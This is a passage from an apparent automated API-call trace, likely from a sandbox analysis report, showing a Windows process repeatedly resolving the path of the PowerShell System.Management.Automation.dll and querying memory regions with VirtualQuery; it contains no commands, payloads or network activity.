lpFilePart=0x0) returned 0x74 [0074.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.037] VirtualQuery (in: lpAddress=0x1ab3c0, lpBuffer=0x1ac280, dwLength=0x30 | out: lpBuffer=0x1ac280*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.038] VirtualQuery (in: lpAddress=0x1ab450, lpBuffer=0x1ac310, dwLength=0x30 | out: lpBuffer=0x1ac310*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.039] VirtualQuery (in: lpAddress=0x1abbd0, lpBuffer=0x1aca90, dwLength=0x30 | out: lpBuffer=0x1aca90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.040] VirtualQuery (in: lpAddress=0x1abbd0, lpBuffer=0x1aca90, dwLength=0x30 | out: lpBuffer=0x1aca90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.041] VirtualQuery (in: lpAddress=0x1abbd0, lpBuffer=0x1aca90, dwLength=0x30 | out: lpBuffer=0x1aca90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.041] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.041] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.042] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.042] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.042] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.042] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.043] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.043] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.043] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.043] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.043] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.044] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.044] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.044] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.045] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.045] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.045] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xb3970107, Data2=0xa6aa, Data3=0x4b12, Data4=([0]=0x8a, [1]=0x24, [2]=0x9f, [3]=0xf5, [4]=0x21, [5]=0xfb, [6]=0xc9, [7]=0xdb))) returned 0x0 [0074.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.048] VirtualQuery (in: lpAddress=0x1abbd0, lpBuffer=0x1aca90, dwLength=0x30 | out: lpBuffer=0x1aca90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.049] VirtualQuery (in: lpAddress=0x1abbd0, lpBuffer=0x1aca90, dwLength=0x30 | out: lpBuffer=0x1aca90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.049] GetFullPathNameW (in: 